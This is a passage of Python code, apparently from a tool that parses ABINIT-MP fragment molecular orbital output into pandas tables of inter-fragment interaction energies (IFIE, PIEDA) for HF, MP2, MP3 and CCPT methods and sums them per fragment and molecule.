fragdatas.append(fragdata)\n readflag = False\n if items[0:2] == [\"ALL\", \"ATOM\"]:\n natom = int(items[3])\n if readflag == True:\n if line[0:21] == \" \":\n # print(line)\n fragdata = fragdata + items\n else:\n if len(fragdata) != 0:\n fragdatas.append(fragdata)\n elecs.append(int(elec))\n fragdata = []\n elec = items[1]\n fragdata = fragdata + items[2:]\n\n if items [0:2] == ['START', 'FRAGMENT'] or items[0] == 'Ions':\n break\n\n ## AUTOMATIC FRAGMENTATION\n if items[0:3] == ['Seq.', 'Frag.', 'Residue']:\n autoreadflag = True\n continue\n\n if autoreadflag == True and items[0:2] == ['The', 'system']:\n autoreadflag = False\n continue\n\n if autoreadflag == True:\n # print(items)\n seqnos.append(items[0])\n fragnos.append(items[1])\n residuestr.append(items[2])\n\n\n nf = len(fragdatas)\n # print('natom', natom)\n # print('nf', len(fragdatas))\n\n na_nfrag = []\n for i in range(len(fragdatas)):\n na_nfrag.append(len(fragdatas[i]))\n # print('na_nfrag\\n', na_nfrag)\n\n # print('Elec.\\n', elecs)\n # print('logreadGeom:', logreadGeom)\n\n # print(pdbabs)\n # print('Frag Atom number\\n', fragdatas)\n\n resname_perfrag = []\n resnamenonum_perfrag = []\n if self.fragmode == 'manual':\n logabsitems = os.path.abspath(ifile).split('/')\n logabsitems[-1] = logreadGeom\n # print(logabsitems)\n pdbabs = \"\"\n for logabsitem in logabsitems:\n pdbabs = pdbabs + logabsitem + '/'\n\n pdbabs = pdbabs[:-1]\n\n ## manual\n\n self.getpdbinfowrap(pdbabs)\n # print(self.resnameRes)\n tgts = []\n for fragdata in fragdatas:\n try:\n tgts.append(fragdata[2])\n except:\n tgts.append(fragdata[0])\n\n for tgt in tgts:\n for i in range(len(self.gatmlabRes)):\n gatmlabs = self.gatmlabRes[i]\n # print(gatmlabs)\n tgtstr = str(tgt).rjust(5)\n if tgtstr in gatmlabs:\n headid = [i, gatmlabs.index(tgtstr)]\n resname_perfrag.append(self.resnameRes[headid[0]][headid[1]] + self.resnumRes[headid[0]][headid[1]].strip())\n resnamenonum_perfrag.append(self.resnameRes[headid[0]][headid[1]])\n\n\n # print(resname_perfrag)\n\n ## auto\n # AUTOMATIC FRAGMENTATION\n if self.fragmode == 'auto':\n alreadys = []\n for i in range(len(fragnos)):\n if fragnos[i] in alreadys:\n continue\n else:\n resname_perfrag.append(residuestr[i] + seqnos[i])\n resnamenonum_perfrag.append(residuestr[i])\n alreadys.append(fragnos[i])\n# print('resname_perfrag', resname_perfrag)\n\n self.resnamenonum_perfrag = resnamenonum_perfrag\n return resname_perfrag, pdbabs\n\n\n def getifiedf(self, ifie, solv=[]):\n '''get ifie data frame from ifie file\n\n get ifie data frame from ifie file\n\n Args:\n ifie (str): ifie file name\n solv (list): solvent name list\n\n Returns:\n df (pandas.DataFrame): ifie data frame\n '''\n\n df = pd.DataFrame(ifie, columns=self.icolumn)\n df['I'] = df['I'].astype(int)\n df['J'] = df['J'].astype(int)\n df['DIST'] = df['DIST'].astype(float)\n df['HF-IFIE'] = df['HF-IFIE'].astype(float) * 627.5095\n\n if self.logMethod == 'MP2':\n df['MP2-IFIE'] = df['MP2-IFIE'].astype(float) * 627.5095\n df['PR-TYPE1'] = df['PR-TYPE1'].astype(float) * 627.5095\n df['GRIMME'] = df['GRIMME'].astype(float) * 627.5095\n df['JUNG'] = df['JUNG'].astype(float) * 627.5095\n df['HILL'] = df['HILL'].astype(float) * 627.5095\n\n # print('solv', solv)\n if len(solv) != 0:\n solvdf = pd.DataFrame(solv, columns=['I', 'J', 'Solv(ES)'])\n solvdf['I'] = solvdf['I'].astype(int)\n solvdf['J'] = solvdf['J'].astype(int)\n solvdf['Solv(ES)'] = solvdf['Solv(ES)'].astype(float)\n\n # print(df.head())\n # print(solvdf.head())\n df = pd.merge(df, solvdf, on=['I', 'J'], how='left')\n print(df.head())\n return df\n\n\n def getbssedf(self, ifie, solv=[]):\n '''get bsse data frame from ifie file\n\n get bsse data frame from ifie file\n\n Args:\n ifie (str): ifie file name\n solv (list): solvent name list\n\n Returns:\n df (pandas.DataFrame): bsse data frame\n '''\n\n df = pd.DataFrame(ifie, columns=self.bicolumn)\n df['I'] = df['I'].astype(int)\n df['J'] = df['J'].astype(int)\n df['DIST'] = df['DIST'].astype(float)\n df['HF-BSSE'] = df['HF-BSSE'].astype(float) * 627.5095\n\n if self.logMethod == 'MP2':\n df['MP2-BSSE'] = df['MP2-BSSE'].astype(float) * 627.5095\n df['PR-T1-BSSE'] = df['PR-T1-BSSE'].astype(float) * 627.5095\n df['GRIMME-BSSE'] = df['GRIMME-BSSE'].astype(float) * 627.5095\n df['JUNG-BSSE'] = df['JUNG-BSSE'].astype(float) * 627.5095\n df['HILL-BSSE'] = df['HILL-BSSE'].astype(float) * 627.5095\n\n df = df.drop(columns='DIST')\n # print(df.head())\n return df\n\n def getpiedadf(self, pieda):\n # print('l669', pieda[1])\n pidf = pd.DataFrame(pieda, columns=self.pcolumn)\n pidf['I'] = pidf['I'].astype(int)\n pidf['J'] = pidf['J'].astype(int)\n pidf['ES'] = pidf['ES'].astype(float)\n pidf['EX'] = pidf['EX'].astype(float)\n pidf['CT-mix'] = pidf['CT-mix'].astype(float)\n if self.abinit_ver == 'rev16' or self.abinit_ver == 'rev17':\n pidf['Solv(ES)'] = pidf['Solv(ES)'].astype(float)\n pidf['DI(MP2)'] = pidf['DI(MP2)'].astype(float)\n pidf['q(I=>J)'] = pidf['q(I=>J)'].astype(float)\n return pidf\n\n def getmomenedf(self, momene):\n df = pd.DataFrame(momene, columns=['Frag.', 'HF', 'MP2'])\n df['Frag.'] = df['Frag.'].astype(int)\n df['HF'] = df['HF'].astype(float)\n df['MP2'] = df['MP2'].astype(float)\n return df\n\n def getdimenedf(self, dimene):\n df = pd.DataFrame(dimene, columns=['I', 'J', 'DIMER-HF', 'DIMER-MP2'])\n df['I'] = df['I'].astype(int)\n df['J'] = df['J'].astype(int)\n df['DIMER-HF'] = df['DIMER-HF'].astype(float)\n df['DIMER-MP2'] = df['DIMER-MP2'].astype(float)\n return df\n\n def getpbpiedadf(self, pieda):\n pidf = pd.DataFrame(pieda, columns=self.pcolumnpb)\n pidf['I'] = pidf['I'].astype(int)\n pidf['J'] = pidf['J'].astype(int)\n pidf['ES'] = pidf['ES'].astype(float)\n pidf['EX'] = pidf['EX'].astype(float)\n pidf['CT-mix'] = pidf['CT-mix'].astype(float)\n pidf['Solv(ES)'] = pidf['Solv(ES)'].astype(float)\n pidf['DI(MP2)'] = pidf['DI(MP2)'].astype(float)\n pidf['q(I=>J)'] = pidf['q(I=>J)'].astype(float)\n pidf.drop(columns=['Solv(ES)'], inplace=True)\n\n return pidf\n\n\n def gettgtpidf_n2ffmatrix(self, mydf=None, is_pb=False):\n print('\\n--- generate pieda', str(self.tgt1frag), str(self.tgt2frag), 'ffmatrix ---\\n')\n esdf = pd.DataFrame(index=self.tgt2frag)\n exdf = pd.DataFrame(index=self.tgt2frag)\n ctdf = pd.DataFrame(index=self.tgt2frag)\n count = 0\n\n if mydf == None:\n df = self.pidf\n else:\n df = mydf\n for f1 in self.tgt1frag:\n wodimesapr_id = []\n tgtdf1 = df[(df['I'] == f1)].rename(columns={'I':'J', 'J':'I'})\n tgtdf2 = df[(df['J'] == f1)]\n tgtdf = tgtdf1.append(tgtdf2)\n # print(tgtdf)\n\n tgtfrags = copy.deepcopy(self.tgt2frag)\n try:\n tgtfrags.remove(f1)\n except:\n pass\n tgtdf_filter = tgtdf[(tgtdf['I'].isin(tgtfrags)) | (tgtdf['J'].isin(tgtfrags))]\n\n fragis = tgtdf_filter['I'].values.tolist()\n fragjs = tgtdf_filter['J'].values.tolist()\n\n # print(tgtdf_filter)\n # pickup fragids from I and J(without dimer es approximation ID)\n for i in range(len(fragis)):\n if fragis[i] != f1:\n wodimesapr_id.append(fragis[i])\n else:\n wodimesapr_id.append(fragjs[i])\n # print('wodimesapr_id', wodimesapr_id)\n\n\n hfifie = 0\n mp2corr = 0\n prmp2corr = 0\n\n esbuf = tgtdf_filter['ES'].values.tolist()\n exbuf = tgtdf_filter['EX'].values.tolist()\n ctbuf = tgtdf_filter['CT-mix'].values.tolist()\n\n # complement values from ifdf\n es = []\n ex = []\n ct = []\n\n print('check frag', f1, 'pieda info')\n for i in range(len(self.tgt2frag)):\n tgtid = self.tgt2frag[i]\n # if tgtid == f1:\n # print('error!! target frag1 and target 2 is duplicate!!')\n # sys.exit()\n if tgtid in wodimesapr_id:\n es.append(esbuf[wodimesapr_id.index(tgtid)])\n ex.append(exbuf[wodimesapr_id.index(tgtid)])\n ct.append(ctbuf[wodimesapr_id.index(tgtid)])\n else:\n if is_pb:\n es.append(self.hfdf.loc[tgtid, str(f1)] - self.solvesdf.loc[tgtid, str(f1)])\n else:\n # print(tgtid, 'is no data')\n es.append(self.hfdf.loc[tgtid, str(f1)])\n ex.append(0.0)\n ct.append(0.0)\n\n esdf[str(f1)] = es\n exdf[str(f1)] = ex\n ctdf[str(f1)] = ct\n\n count += 1\n\n print ('ES\\n', esdf.head())\n print ('EX\\n', exdf.head())\n print ('CT\\n', ctdf.head())\n\n self.esdf = esdf\n self.exdf = exdf\n self.ctdf = ctdf\n\n return\n\n\n def gettgtdf_n2ffmatrix(self, mydf=None):\n # generate frags-frags matrix\n print('\\n--- generate ifie', str(self.tgt1frag), str(self.tgt2frag), 'ffmatrix---\\n')\n hfdf = pd.DataFrame(index=self.tgt2frag)\n distdf = pd.DataFrame(index=self.tgt2frag)\n solvesdf = pd.DataFrame(index=self.tgt2frag)\n\n if mydf == None:\n df = self.ifdf\n else:\n df = mydf\n count = 0\n\n if self.logMethod in ['MP2', 'HF+D']:\n mp2corrdf = pd.DataFrame(index=self.tgt2frag)\n prmp2corrdf = pd.DataFrame(index=self.tgt2frag)\n mp2tdf = pd.DataFrame(index=self.tgt2frag)\n prmp2tdf = pd.DataFrame(index=self.tgt2frag)\n\n for f1 in self.tgt1frag:\n fragids = []\n tgtdf1 = df[(df['I'] == f1)].rename(columns={'I':'J', 'J':'I'})\n tgtdf2 = df[(df['J'] == f1)]\n tgtdf = tgtdf1.append(tgtdf2)\n # print(tgtdf)\n\n tgtfrags = copy.deepcopy(self.tgt2frag)\n try:\n tgtfrags.remove(f1)\n except:\n pass\n tgtdf_filter = tgtdf[(tgtdf['I'].isin(tgtfrags)) | (tgtdf['J'].isin(tgtfrags))]\n\n # print(tgtdf_filter.columns.tolist())\n if f1 in self.tgt2frag:\n # print ([i for i in range(len(tgtdf_filter.columns))])\n adddf = pd.DataFrame([f1, f1]+ [0 for i in range(len(tgtdf_filter.columns)-2)], index=tgtdf_filter.columns).T\n tgtdf_filter = tgtdf_filter.append(adddf).sort_values('I')\n print(tgtdf_filter.head())\n\n hfifie = 0\n mp2corr = 0\n prmp2corr = 0\n hfifie = tgtdf_filter['HF-IFIE'].values.tolist()\n mp2corr = tgtdf_filter['MP2-IFIE'].values.tolist()\n prmp2corr = tgtdf_filter['PR-TYPE1'].values.tolist()\n dist = tgtdf_filter['DIST'].values.tolist()\n\n mp2total = []\n prmp2total = []\n for i in range(len(hfifie)):\n mp2total.append(hfifie[i] + mp2corr[i])\n prmp2total.append(hfifie[i] + prmp2corr[i])\n\n hfdf[str(f1)] = hfifie\n mp2corrdf[str(f1)] = mp2corr\n prmp2corrdf[str(f1)] = prmp2corr\n mp2tdf[str(f1)] = mp2total\n prmp2tdf[str(f1)] = prmp2total\n distdf[str(f1)] = dist\n\n if 'Solv(ES)' in tgtdf_filter.columns:\n solves = tgtdf_filter['Solv(ES)'].values.tolist()\n solvesdf[str(f1)] = solves\n\n count += 1\n\n print ('HF\\n', hfdf.head())\n print ('MP2corr\\n', mp2corrdf.head())\n print ('PRMP2corr\\n', prmp2corrdf.head())\n print ('MP2total\\n', mp2tdf.head())\n print ('PRMP2total\\n', prmp2tdf.head())\n\n self.hfdf = hfdf\n self.mp2corrdf = mp2corrdf\n self.prmp2corrdf = prmp2corrdf\n self.mp2tdf = mp2tdf\n self.prmp2tdf = prmp2tdf\n self.distdf = distdf\n\n if 'Solv(ES)' in tgtdf_filter.columns:\n self.solvesdf = solvesdf\n\n elif self.logMethod == 'HF':\n for f1 in self.tgt1frag:\n fragids = []\n tgtdf = df[(df['I'] == f1) | (df['J'] == f1)]\n tgtdf_filter = tgtdf[(tgtdf['I'].isin(self.tgt2frag)) | (tgtdf['J'].isin(self.tgt2frag))]\n\n hfifie = 0\n hfifie = tgtdf_filter['HF-IFIE'].values.tolist()\n dist = tgtdf_filter['DIST'].values.tolist()\n\n hfdf[str(f1)] = hfifie\n distdf[str(f1)] = dist\n\n if 'Solv(ES)' in tgtdf_filter.columns:\n solves = tgtdf_filter['Solv(ES)'].values.tolist()\n solvesdf[str(f1)] = solves\n\n count += 1\n\n print ('HF\\n', hfdf.head())\n\n self.hfdf = hfdf\n self.distdf = distdf\n\n if 'Solv(ES)' in tgtdf_filter.columns:\n self.solvesdf = solvesdf\n\n elif self.logMethod == 'MP3':\n mp2corrdf = pd.DataFrame(index=self.tgt2frag)\n mp3corrdf = pd.DataFrame(index=self.tgt2frag)\n mp25corrdf = pd.DataFrame(index=self.tgt2frag)\n usermp3corrdf = pd.DataFrame(index=self.tgt2frag)\n mp2tdf = pd.DataFrame(index=self.tgt2frag)\n mp3tdf = pd.DataFrame(index=self.tgt2frag)\n mp25tdf = pd.DataFrame(index=self.tgt2frag)\n usermp3tdf = pd.DataFrame(index=self.tgt2frag)\n\n for f1 in self.tgt1frag:\n fragids = []\n tgtdf = df[(df['I'] == f1) | (df['J'] == f1)]\n tgtdf_filter = tgtdf[(tgtdf['I'].isin(self.tgt2frag)) | (tgtdf['J'].isin(self.tgt2frag))]\n\n print(tgtdf_filter)\n hfifie = 0\n mp2corr = 0\n mp3corr = 0\n usermp3corr = 0\n hfifie = tgtdf_filter['HF-IFIE'].values.tolist()\n mp2corr = tgtdf_filter['MP2-IFIE'].values.tolist()\n mp3corr = tgtdf_filter['MP3-IFIE'].values.tolist()\n usermp3corr = tgtdf_filter['USER-MP3'].values.tolist()\n dist = tgtdf_filter['DIST'].values.tolist()\n\n mp2total = []\n mp3total = []\n usermp3total = []\n mp25corr = []\n mp25total = []\n for i in range(len(hfifie)):\n mp2total.append(hfifie[i] + mp2corr[i])\n mp3total.append(hfifie[i] + mp3corr[i])\n usermp3total.append(hfifie[i] + usermp3corr[i])\n mp25total.append(hfifie[i] + (mp2corr[i] + mp3corr[i])*0.5)\n mp25corr.append((mp2corr[i] + mp3corr[i])*0.5)\n\n # print('hfifie', hfifie)\n # print('tgtfrag', self.tgt2frag)\n\n hfdf[str(f1)] = hfifie\n mp2corrdf[str(f1)] = mp2corr\n mp3corrdf[str(f1)] = mp3corr\n mp25corrdf[str(f1)] = mp25corr\n usermp3corrdf[str(f1)] = usermp3corr\n mp2tdf[str(f1)] = mp2total\n mp3tdf[str(f1)] = mp3total\n mp25tdf[str(f1)] = mp25total\n usermp3tdf[str(f1)] = usermp3total\n distdf[str(f1)] = dist\n\n\n count += 1\n\n print ('HF\\n', hfdf.head())\n print ('MP3corr\\n', mp3corrdf.head())\n print ('USER-MP3corr\\n', usermp3corrdf.head())\n print ('MP3total\\n', mp3tdf.head())\n print ('USER-MP3total\\n', usermp3tdf.head())\n\n self.hfdf = hfdf\n self.mp2corrdf = mp2corrdf\n self.mp3corrdf = mp3corrdf\n self.mp25corrdf = mp25corrdf\n self.usermp3corrdf = usermp3corrdf\n self.mp2tdf = mp2tdf\n self.mp3tdf = mp3tdf\n self.mp25tdf = mp25tdf\n self.usermp3tdf = usermp3tdf\n self.distdf = distdf\n\n elif self.logMethod == 'CCPT':\n mp2corrdf = pd.DataFrame(index=self.tgt2frag)\n mp3corrdf = pd.DataFrame(index=self.tgt2frag)\n mp4corrdf = pd.DataFrame(index=self.tgt2frag)\n mp25corrdf = pd.DataFrame(index=self.tgt2frag)\n mp35corrdf = pd.DataFrame(index=self.tgt2frag)\n mp2tdf = pd.DataFrame(index=self.tgt2frag)\n mp3tdf = pd.DataFrame(index=self.tgt2frag)\n mp4tdf = pd.DataFrame(index=self.tgt2frag)\n mp25tdf = pd.DataFrame(index=self.tgt2frag)\n mp35tdf = pd.DataFrame(index=self.tgt2frag)\n\n for f1 in self.tgt1frag:\n fragids = []\n tgtdf = df[(df['I'] == f1) | (df['J'] == f1)]\n tgtdf_filter = tgtdf[(tgtdf['I'].isin(self.tgt2frag)) | (tgtdf['J'].isin(self.tgt2frag))]\n\n hfifie = 0\n mp3corr = 0\n usermp3corr = 0\n hfifie = tgtdf_filter['HF-IFIE'].values.tolist()\n mp2corr = tgtdf_filter['MP2-IFIE'].values.tolist()\n mp3corr = tgtdf_filter['MP3-IFIE'].values.tolist()\n mp4corr = tgtdf_filter['MP4-IFIE'].values.tolist()\n dist = tgtdf_filter['DIST'].values.tolist()\n\n\n mp2total = []\n mp3total = []\n mp4total = []\n mp25corr = []\n mp35corr = []\n mp25total = []\n mp35total = []\n for i in range(len(hfifie)):\n mp2total.append(hfifie[i] + mp2corr[i])\n mp3total.append(hfifie[i] + mp3corr[i])\n mp4total.append(hfifie[i] + mp4corr[i])\n mp25corr.append((mp2corr[i] + mp3corr[i])*0.5)\n mp35corr.append((mp2corr[i] + mp4corr[i])*0.5)\n mp25total.append(hfifie[i] + (mp2corr[i] + mp3corr[i])*0.5)\n mp35total.append(hfifie[i] + (mp2corr[i] + mp4corr[i])*0.5)\n\n # print('hfifie', hfifie)\n # print('tgtfrag', self.tgt2frag)\n\n hfdf[str(f1)] = hfifie\n mp2corrdf[str(f1)] = mp2corr\n mp3corrdf[str(f1)] = mp3corr\n mp4corrdf[str(f1)] = mp4corr\n mp25corrdf[str(f1)] = mp25corr\n mp35corrdf[str(f1)] = mp35corr\n mp2tdf[str(f1)] = mp2total\n mp3tdf[str(f1)] = mp3total\n mp4tdf[str(f1)] = mp4total\n mp25tdf[str(f1)] = mp25total\n mp35tdf[str(f1)] = mp35total\n distdf[str(f1)] = dist\n\n count += 1\n\n# print ('HF\\n', hfdf.head())\n# print ('MP3corr\\n', mp3corrdf.head())\n# print ('USER-MP3corr\\n', usermp3corrdf.head())\n# print ('MP3total\\n', mp3tdf.head())\n# print ('USER-MP3total\\n', usermp3tdf.head())\n\n self.hfdf = hfdf\n self.mp2corrdf = mp2corrdf\n self.mp3corrdf = mp3corrdf\n self.mp4corrdf = mp4corrdf\n self.mp25corrdf = mp25corrdf\n self.mp35corrdf = mp35corrdf\n self.mp2tdf = mp2tdf\n self.mp3tdf = mp3tdf\n self.mp4tdf = mp4tdf\n self.mp25tdf = mp25tdf\n self.mp35tdf = mp35tdf\n self.distdf = distdf\n\n return\n\n def depth(self, k):\n if not k:\n return 0\n else:\n if isinstance(k, list):\n return 1 + max(self.depth(i) for i in k)\n else:\n return 0\n\n def gettgtdf_n2tfmatrix(self, i, df, f1):\n # gettgtdf_normal to times-frags\n if self.depth(self.tgt2frag) >= 2:\n tgt2frag = self.tgt2frag[i]\n else:\n tgt2frag = self.tgt2frag\n\n hfdf = pd.DataFrame(index=tgt2frag)\n mp2corrdf = pd.DataFrame(index=tgt2frag)\n prmp2corrdf = pd.DataFrame(index=tgt2frag)\n mp2tdf = pd.DataFrame(index=tgt2frag)\n prmp2tdf = pd.DataFrame(index=tgt2frag)\n distdf = pd.DataFrame(index=tgt2frag)\n\n fragids = []\n tgtdf1 = df[(df['I'] == f1)].rename(columns={'I':'J', 'J':'I'})\n tgtdf2 = df[(df['J'] == f1)]\n tgtdf = tgtdf1.append(tgtdf2)\n\n tgtfrags = copy.deepcopy(tgt2frag)\n try:\n tgtfrags.remove(f1)\n except:\n pass\n tgtdf_filter = tgtdf[(tgtdf['I'].isin(tgtfrags)) | (tgtdf['J'].isin(tgtfrags))]\n\n\n if f1 in tgt2frag:\n # print ([i for i in range(len(tgtdf_filter.columns))])\n adddf = pd.DataFrame([f1, f1]+ [0 for j in range(len(tgtdf_filter.columns)-2)], index=tgtdf_filter.columns).T\n tgtdf_filter = tgtdf_filter.append(adddf).sort_values('I')\n # print(tgtdf_filter.head())\n\n hfifie = 0\n mp2corr = 0\n prmp2corr = 0\n hfifie = tgtdf_filter['HF-IFIE'].values.tolist()\n mp2corr = tgtdf_filter['MP2-IFIE'].values.tolist()\n prmp2corr = tgtdf_filter['PR-TYPE1'].values.tolist()\n dist = tgtdf_filter['DIST'].values.tolist()\n\n mp2total = []\n prmp2total = []\n for j in range(len(hfifie)):\n mp2total.append(hfifie[j] + mp2corr[j])\n prmp2total.append(hfifie[j] + prmp2corr[j])\n\n # print('hfifie', len(hfifie))\n # print('hfifie', hfifie)\n hfdf[self.tgttimes[i]] = hfifie\n mp2corrdf[self.tgttimes[i]] = mp2corr\n prmp2corrdf[self.tgttimes[i]] = prmp2corr\n mp2tdf[self.tgttimes[i]] = mp2total\n prmp2tdf[self.tgttimes[i]] = prmp2total\n distdf[self.tgttimes[i]] = dist\n\n\n # print (hfdf.head())\n # print (mp2corrdf.head())\n # print (prmp2corrdf.head())\n # print (mp2tdf.head())\n # print (prmp2tdf.head())\n #print(distdf.head())\n\n return hfdf, mp2corrdf, prmp2corrdf, mp2tdf, prmp2tdf, distdf\n\n\n def gettgtpidf_n2tfmatrix(self, i, df, hfdf, f1):\n # define tgtfrag for molname - frags\n if self.depth(self.tgt2frag) >= 2:\n tgt2frag = self.tgt2frag[i]\n else:\n tgt2frag = self.tgt2frag\n\n esdf = pd.DataFrame(index=tgt2frag)\n exdf = pd.DataFrame(index=tgt2frag)\n ctdf = pd.DataFrame(index=tgt2frag)\n didf = pd.DataFrame(index=tgt2frag)\n\n tgtdf1 = df[(df['I'] == f1)].rename(columns={'I':'J', 'J':'I'})\n tgtdf2 = df[(df['J'] == f1)]\n tgtdf = tgtdf1.append(tgtdf2)\n # print(tgtdf)\n\n tgtfrags = copy.deepcopy(tgt2frag)\n try:\n tgtfrags.remove(f1)\n except:\n pass\n tgtdf_filter = tgtdf[(tgtdf['I'].isin(tgtfrags)) | (tgtdf['J'].isin(tgtfrags))]\n\n fragis = tgtdf_filter['I'].values.tolist()\n fragjs = tgtdf_filter['J'].values.tolist()\n\n # pickup wodimesapr_id from I and J\n wodimesapr_id = []\n for j in range(len(fragis)):\n if fragis[j] != f1:\n wodimesapr_id.append(fragis[j])\n else:\n wodimesapr_id.append(fragjs[j])\n # print(wodimesapr_id)\n\n hfifie = 0\n mp2corr = 0\n prmp2corr = 0\n\n esbuf = tgtdf_filter['ES'].values.tolist()\n exbuf = tgtdf_filter['EX'].values.tolist()\n ctbuf = tgtdf_filter['CT-mix'].values.tolist()\n dibuf = tgtdf_filter['DI(MP2)'].values.tolist()\n\n\n # complement values from ifdf\n es = []\n ex = []\n ct = []\n di = []\n\n for j in range(len(tgt2frag)):\n tgtid = tgt2frag[j]\n# if tgtid == f1:\n# continue\n if tgtid in wodimesapr_id:\n es.append(esbuf[wodimesapr_id.index(tgtid)])\n ex.append(exbuf[wodimesapr_id.index(tgtid)])\n ct.append(ctbuf[wodimesapr_id.index(tgtid)])\n di.append(dibuf[wodimesapr_id.index(tgtid)])\n else:\n es.append(hfdf.loc[tgtid, str(self.tgttimes[i])])\n ex.append(0.0)\n ct.append(0.0)\n di.append(0.0)\n\n esdf[self.tgttimes[i]] = es\n exdf[self.tgttimes[i]] = ex\n ctdf[self.tgttimes[i]] = ct\n didf[self.tgttimes[i]] = di\n\n# print (esdf.head())\n# print (exdf.head())\n# print (ctdf.head())\n\n # print('esdf\\n', esdf)\n return esdf, exdf, didf, ctdf\n\n # return hfdf, mp2corrdf, prmp2corrdf, mp2tdf, prmp2tdf\n\n def gettgtdf_fd(self, df):\n\n # filter tgt1frag IFIE\n tgtdf = df[(df['I'] == self.tgt1frag[0]) | (df['J'] == self.tgt1frag[0])]\n if self.tgt2type == 'dist':\n print('--- ifie around tgt ', self.tgt1frag, self.dist, 'angstrom ---')\n tgtdf_filter = tgtdf[tgtdf['DIST'] < self.dist]\n elif self.tgt2type == 'dimer-es':\n print('--- ifie around tgt ', self.tgt1frag, 'without Dimer-es approximation ---')\n if self.f90soflag == True:\n tgtdf_filter = tgtdf[tgtdf['DIMER-ES'] == 0]\n else:\n tgtdf_filter = tgtdf[tgtdf['DIMER-ES'] == 'F']\n\n return tgtdf, tgtdf_filter\n\n def gettgtdf_ff(self, df, frag1, frag2):\n # print('--- ifie frag ', frag1, frag2, '----')\n frag1 = int(frag1)\n frag2 = int(frag2)\n tgtdf_filter = df[((df['I'] == frag1) & (df['J'] == frag2)) | ((df['I'] == frag2) & (df['J'] == frag1))]\n # tgtdf_filter = df[((df['I'] == frag1) & (df['J'] == frag2)) | ((df['I'] == frag2) & (df['J'] == frag1))]\n return tgtdf_filter\n\n\n def gettgtdf_ffs(self, df, frag1, frag2):\n # print('--- ifie frag ', frag1, frag2, '----')\n print(frag1, frag2)\n tgtdf_filter = df[((df['I'] == frag1) & (df['J'].isin(frag2))) | ((df['I'].isin(frag2)) & (df['J'] == frag1))]\n # tgtdf_filter = df[((df['I'] == frag1) & (df['J'] == frag2)) | ((df['I'] == frag2) & (df['J'] == frag1))]\n return tgtdf_filter\n\n\n def getifiesummol(self, df, molfrags, molid):\n tgtdf_filters = pd.DataFrame(columns=self.icolumn)\n print(self.dist)\n tgtdf = df[df['I'].isin(molfrags) | df['J'].isin(molfrags)]\n tgtdf_filters = tgtdf[tgtdf['DIST'] < self.dist]\n\n print(tgtdf_filters.head())\n\n # get I column value\n neighbor_i = [index for index, row in tgtdf_filters.groupby(\"I\")]\n print(neighbor_i)\n # get J coulum value\n neighbor_j = [index for index, row in tgtdf_filters.groupby(\"J\")]\n neighbors= list(set(neighbor_i + neighbor_j))\n neighbors.sort()\n alreadys = copy.deepcopy(molfrags)\n contactmolfrags = []\n for i in neighbors:\n if i in alreadys:\n continue\n molfrag_new = self.getmolfrags(i, df)\n contactmolfrags.append(molfrag_new)\n alreadys = alreadys + molfrag_new\n # print(alreadys)\n print('contactmolfrags\\n', contactmolfrags)\n\n # print('-- ifie frag_mol --')\n '''\n ifie_frag_mol: df frag-frag in each mol\n ifiesums: mol-mol ifie for each mol\n '''\n\n ifdf_frag_mols = []\n for contactmolfrag in contactmolfrags:\n ifie_frag_mol = df[(df['I'].isin(contactmolfrag) & df['J'].isin(molfrags)) | (df['J'].isin(contactmolfrag) & df['I'].isin(molfrags))]\n ifdf_frag_mols.append(ifie_frag_mol)\n\n #pieda\n for i in range(len(ifdf_frag_mols)):\n ifdf_frag_mols[i] = pd.merge(ifdf_frag_mols[i], self.pidf, on=['I', 'J'], how='left')\n print(ifdf_frag_mols[0])\n\n\n count = 0\n if self.abinit_ver == 'rev17' or self.abinit_ver == 'rev16':\n self.ifdfsumcolumn = [['HF-IFIE', 'MP2-IFIE', 'ES', 'EX', 'Solv(ES)', 'CT-mix', 'DI(MP2)', 'q(I=>J)']]\n\n HF_IFIE_sums = []\n MP2_IFIE_sums = []\n PR_TYPE1_sums = []\n GRIMME_sums = []\n JUNG_sums = []\n HILL_sums = []\n ES_sums = []\n EX_sums = []\n CT_sums = []\n DI_sums = []\n q_sums = []\n\n for datadf in ifdf_frag_mols:\n HF_IFIE_sum, MP2_IFIE_sum, PR_TYPE1_sum, GRIMME_sum, JUNG_sum, HILL_sum, ES_sum, EX_sum, CT_sum, DI_sum, q_sum = self.getsumdf(datadf)\n HF_IFIE_sums.append(HF_IFIE_sum)\n MP2_IFIE_sums.append(MP2_IFIE_sum)\n PR_TYPE1_sums.append(PR_TYPE1_sum)\n GRIMME_sums.append(GRIMME_sum)\n JUNG_sums.append(JUNG_sum)\n HILL_sums.append(HILL_sum)\n ES_sums.append(ES_sum)\n EX_sums.append(EX_sum)\n CT_sums.append(CT_sum)\n DI_sums.append(DI_sum)\n q_sums.append(q_sum)\n\n ifdf_mol_mol = pd.DataFrame(columns=self.ifdfsumcolumn)\n # self.ifdfsumcolumn = ['HF-IFIE', 'MP2-IFIE', 'PR-TYPE1', 'GRIMME', 'JUNG', 'HILL', 'ES', 'EX', 'CT-mix', 'DI(MP2)', 'q(I=>J)']\n\n ifdf_mol_mol['I'] = contactmolfrags\n ifdf_mol_mol['J'] = [molfrags for i in range(len(HF_IFIE_sums))]\n ifdf_mol_mol['HF-IFIE'] = HF_IFIE_sums\n ifdf_mol_mol['MP2-IFIE'] = MP2_IFIE_sums\n ifdf_mol_mol['PR_TYPE1'] = PR_TYPE1_sums\n ifdf_mol_mol['GRIMME'] = GRIMME_sums\n ifdf_mol_mol['JUNG'] = JUNG_sums\n ifdf_mol_mol['HILL'] = HILL_sums\n ifdf_mol_mol['ES'] = ES_sums\n ifdf_mol_mol['EX'] = EX_sums\n ifdf_mol_mol['CT-mix'] = CT_sums\n ifdf_mol_mol['DI(MP2)'] = DI_sums\n ifdf_mol_mol['q(I=>J)'] = q_sums\n\n\n HF_IFIE_molsum = sum(HF_IFIE_sums)\n MP2_IFIE_molsum = sum(MP2_IFIE_sums)\n PR_TYPE1_molsum = sum(PR_TYPE1_sums)\n GRIMME_molsum = sum(GRIMME_sums)\n JUNG_molsum = sum(JUNG_sums)\n HILL_molsum = sum(HILL_sums)\n ES_molsum = sum(ES_sums)\n EX_molsum = sum(EX_sums)\n CT_molsum = sum(CT_sums)\n DI_molsum = sum(DI_sums)\n q_molsum = sum(q_sums)\n\n ifdf_molsum = pd.Series([HF_IFIE_molsum, MP2_IFIE_molsum, PR_TYPE1_molsum, GRIMME_molsum, JUNG_molsum, HILL_molsum, ES_molsum, EX_molsum, CT_molsum, DI_molsum, q_molsum], index=self.ifdfsumcolumn, name='mol'+str(molid))\n\n return contactmolfrags, ifdf_frag_mols, ifdf_mol_mol, 